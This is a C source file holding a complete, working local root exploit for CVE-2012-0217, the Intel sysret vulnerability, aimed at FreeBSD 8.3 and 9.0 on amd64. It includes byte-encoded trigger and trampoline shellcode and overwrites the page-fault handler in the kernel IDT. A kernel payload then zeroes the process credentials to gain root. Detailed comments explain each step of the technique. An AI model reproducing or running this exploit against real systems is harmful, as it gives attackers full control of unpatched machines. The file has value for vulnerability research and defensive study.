// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>

uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()
{
	struct region_descriptor idt;

	asm ("sidt %0": "=m"(idt));

	return (struct gate_descriptor*)idt.rd_base;
} 

u_long get_symaddr(char *symname)
{
	struct kld_sym_lookup ksym;

	ksym.version = sizeof (ksym);
	ksym.symname = symname;

	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
		perror("kldsym");
		exit(1);
	}
	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
	return ksym.symvalue;
}

// Code taken from amd64/amd64/machdep.c
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
	struct gate_descriptor *ip;

	ip = idt + idx;
	ip->gd_looffset = func;
	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
	ip->gd_ist = ist;
	ip->gd_xx = 0;
	ip->gd_type = typ;
	ip->gd_dpl = dpl;
	ip->gd_p = 1;
	ip->gd_hioffset = func>>16;
}

void shellcode()
{
	// Actually we dont really need to spawn a shell since we
	// changed our whole cred struct.
	// Just exit...
	printf("[*] Got root!\n");
	exit(0);
}

void kernelmodepayload()
{
	struct thread *td;
	struct ucred *cred;

	// We need to restore/recover whatever we smashed
	// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
	// idt[18], idt[17] and idt[16]
	// thus overall we have:
	// - idt[18], idt[17] and idt[16] are trashed
	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
	// - rdi -> overwrites the 64bit-LSB of idt[7]
	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
	struct gate_descriptor *idt = sidt();
	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

	// get the thread pointer
	asm ("mov %%gs:0, %0" : "=r"(td));

	// The Dark Knight Rises
	cred = td->td_proc->p_ucred;
	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
	cred->cr_groups[0] = 0;

	// return to user mode to spawn the shell
	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}

#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18

void trigger()
{
	printf("[*] Setup...\n");
	// Allocate one page just before the non-canonical address
	printf("    [+] Trigger code...\n");
	uint64_t pagesize = getpagesize();
	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
	area = mmap(area, pagesize,
		PROT_READ | PROT_WRITE | PROT_EXEC,
		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
	if (area == MAP_FAILED) {
		perror("mmap (trigger)");
		exit(1);
	}

	// Copy the trigger code at the end of the page
	// such that the syscall instruction is at its
	// boundary
	char triggercode[] =
		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
		"\x0f\x05"; // syscall

	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

	// There are two outcomes given a target rsp:
	// - if rsp can't be written to, a double fault is triggered
	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
	//   and the exception frame is pushed to a special stack
	// - otherwise a #GP is triggered
	//	 (Xprot defined in sys/amd64/amd64/exception.S)
	//   and the exception frame is pushed to [rsp]
	//
	// In the latter case, trouble is... #GP triggers a page fault
	// (Xpage):
	//  IDTVEC(prot)
	//  	subq	$TF_ERR,%rsp
	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
	//  [2]	movq	$0,TF_ADDR(%rsp)
	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
	//  	leaq	doreti_iret(%rip),%rdi
	//  	cmpq	%rdi,TF_RIP(%rsp)
	//  	je	1f			/* kernel but with user gsbase!! */
	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
	//  	jz	2f			/* already running with kernel GS.base */
	//  1:	swapgs
	//  2:	movq	PCPU(CURPCB),%rdi [5]
	//
	// [4] sets the Z flag because we come from the kernel (while executing sysret)
	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
	// it was restored just before calling sysret...
	// Thus, [5] triggers a pagefault while trying to access gs:data
	// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
	//
	// We therefore need a way: (1) to recover from the GP, (2) to clean
	// any mess we did. Both could be solved if we can get get an arbitrary
	// code execution by the time we reach [5] (NB: this is not mandatory, we could
	// get the code execution later down the fault trigger chain)
	//
	// So... here is the idea: wouldn't it be nice if we could overwrite the
	// page fault handler's address and therefore get code execution when [5]
	// triggers the #PF?
	//
	// For reference:
	// Gate descriptor:
	// +0: Target Offset[15:0] | Target Selector
	// +4: Some stuff | Target Offset[31:16]
	// +8: Target Offset[63:32]
	// +12: Stuff
	//
	// and from include/frame.h:
	//  struct trapframe {
	//  	register_t	tf_rdi;
	//  	register_t	tf_rsi;
	//  	register_t	tf_rdx;
	//  	register_t	tf_rcx;
	//  	register_t	tf_r8;
	//  	register_t	tf_r9;
	//  	register_t	tf_rax;
	//  	register_t	tf_rbx;
	//  	register_t	tf_rbp;
	//  	register_t	tf_r10;
	//  	register_t	tf_r11;
	//  	register_t	tf_r12;
	//  	register_t	tf_r13;
	//  	register_t	tf_r14;
	//  	register_t	tf_r15;
	//  	uint32_t	tf_trapno;
	//  	uint16_t	tf_fs;
	//  	uint16_t	tf_gs;
	//  	register_t	tf_addr;
	//  	uint32_t	tf_flags;
	//  	uint16_t	tf_es;
	//  	uint16_t	tf_ds;
	//  	/* below portion defined in hardware */
	//  	register_t	tf_err;
	//  	register_t	tf_rip;
	//  	register_t	tf_cs;
	//  	register_t	tf_rflags;
	//  	register_t	tf_rsp;
	//  	register_t	tf_ss;
	//  };
	//
	// When the exception is triggered, the hardware pushes
	// ss, rsp, rflags, cs, rip and err
	//
	// We can see that [1], [2] and [3] write to the stack
	// [3] is fully user-controlled through rdi, so we could try to align
	// rsp such that [3] overwrites the offset address
	//
	// The trouble is... rsp is 16byte aligned for exceptions. We can
	// therefore only overwrite the first 32-LSB of the offset address
	// (check how rdi is 16byte aligned in this trapframe)
	//
	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
	// and tf_trapno is 16byte aligned + 8!
	// This enables us to set Target Offset[63:32] to 0x9
	//
	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
	// some setup and jump to our kernel mode code
	printf("    [+] Trampoline code...\n");
	char trampolinecode[] =
		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
		"\xff\xe0"; // jmp rax

	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
	size_t trampoline_allocsize = pagesize;
	// We round the address to the PAGESIZE for the allocation
	// Not enough space for the trampoline code ?
	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
		trampoline_allocsize += pagesize;
	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
		PROT_READ | PROT_WRITE | PROT_EXEC,
		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
	{
		perror("mmap (trampoline)");
		exit(1);
	}
	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
	// Call it
	printf("[*] Fire in the hole!\n");
	((void (*)())trigger_addr)();
}

typedef struct validtarget
{
	char * sysname;
	char * release;
	char * machine;
} validtarget_t;

int validate_target(char * sysname, char * release, char * machine)
{
	validtarget_t targets[] = {
		{ "FreeBSD", "8.3-RELEASE", "amd64" },
		{ "FreeBSD", "9.0-RELEASE", "amd64" },
		{ 0, 0, 0 }
	};

	int found = 0;
	int i = 0;

	while (!found && targets[i].sysname) {
		found = !strcmp(targets[i].sysname, sysname)
			&& !strcmp(targets[i].release, release)
			&& !strcmp(targets[i].machine, machine);
		++i;
	}
	return found;
}

void get_cpu_vendor(char * cpu_vendor)
{
	u_int regs[4];

	do_cpuid(0, regs);
   ((u_int *)cpu_vendor)[0] = regs[1];
   ((u_int *)cpu_vendor)[1] = regs[3];
   ((u_int *)cpu_vendor)[2] = regs[2];
   cpu_vendor[12] = '\0';
}

int is_intel()
{
	char cpu_vendor[13];

	get_cpu_vendor(cpu_vendor);
	return !strcmp(cpu_vendor, "GenuineIntel");
}

int main(int argc, char *argv[])
{
	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");

	printf("[*] Retrieving host information...\n");
	char cpu_vendor[13];
	get_cpu_vendor(cpu_vendor);
	struct utsname ver;
	uname(&ver);
	printf("    [+] CPU: %s\n", cpu_vendor);
	printf("    [+] sysname: %s\n", ver.sysname);
	printf("    [+] release: %s\n", ver.release);
	printf("    [+] version: %s\n", ver.version);
	printf("    [+] machine: %s\n", ver.machine);
	printf("[*] Validating target OS and version...\n");
	if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
		printf("    [+] NOT Vulnerable :-(\n");
		exit(1);
	} else
		printf("    [+] Vulnerable :-)\n");
	// Prepare the values we'll need to restore the kernel to a stable state
	printf("[*] Resolving kernel addresses...\n");
	Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
	Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
	Xill_ptr = (uintptr_t)get_symaddr("Xill");
	Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
	Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
	Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
	Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
	Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
	Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
	// doeet!
	trigger();
	return 0;
}

